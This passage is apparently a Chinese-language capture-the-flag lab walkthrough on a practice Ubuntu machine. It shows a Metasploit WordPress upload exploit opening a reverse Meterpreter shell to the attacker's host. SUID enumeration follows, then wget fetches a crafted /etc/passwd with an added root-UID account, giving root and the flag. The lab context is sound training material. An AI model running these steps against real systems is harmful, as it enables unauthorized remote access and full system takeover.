msf5 exploit(unix/webapp/wp_slideshowgallery_upload) > run
[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file gxwuywll.php
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 2 opened (192.168.116.1:4444 -> 192.168.116.138:41014) at 2019-09-26 18:24:09 +0800
[+] Deleted gxwuywll.php
meterpreter >
提Root权权限
- 随便选一个session,进入Shell,查找SUID权限文件。
meterpreter > shell
Process 2084 created.
Channel 0 created.
www-data@ubuntu:/var/www$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/arping
/usr/bin/wget
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/cp
/bin/su
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
www-data@ubuntu:/var/www$
- 看到有cp和wget命令,两个都能覆盖文件,就是把passwd文件改了
www-data@ubuntu:/etc$ wget -O passwd http://192.168.116.1:8000/passwd
wget -O passwd http://192.168.116.1:8000/passwd
ERROR: could not open HSTS store. HSTS will be disabled.
--2019-09-26 11:54:08-- http://192.168.116.1:8000/passwd
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2557 (2.5K) [application/octet-stream]
Saving to: 'passwd'
passwd 100%[===================>] 2.50K --.-KB/s in 0.001s
2019-09-26 11:54:08 (2.86 MB/s) - 'passwd' saved [2557/2557]
www-data@ubuntu:/etc$ cat passwd
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
mysql:x:122:128:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:124:65534::/run/sshd:/usr/sbin/nologin
kt:$1$kt$mR/jSFSDV/G0vNQ72T8cs.:0:0:root:/root:/bin/bash
www-data@ubuntu:/etc$ su kt
su kt
Password: 123
root@ubuntu:/etc# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/etc#
获取Flag
root@ubuntu:/etc# cd /root
cd /root
root@ubuntu:~# ls
ls
proof.txt
root@ubuntu:~# cat proof.txt
cat proof.txt
_________________________________________________________________________
_____ _ _ U _____ u U _____ u _ _ ____ |
|_ " _| |'| |'| \| ___"|/ \| ___"|/ | \ |"| | _"\ |
| | /| |_| |\ | _|" | _|" <| \| |> /| | | | |
/| |\ U| _ |u | |___ | |___ U| |\ |u U| |_| |\ |
u |_|U |_| |_| |_____| |_____| |_| \_| |____/ u |
_// \\_ // \\ << >> << >> || \\,-. |||_ |
(__) (__) (_") ("_) (__) (__) (__) (__) (_") (_/ (__)_) |
|
|
!! Congrats you have finished this task !! |
|
Contact us here: |
|
Hacking Articles : https://twitter.com/rajchandel/ |
|
|
+-+-+-+-+-+ +-+-+-+-+-+-+-+ |
|E|n|j|o|y| |H|A|C|K|I|N|G| |
+-+-+-+-+-+ +-+-+-+-+-+-+-+ |
________________________________________________________________________|
root@ubuntu:~#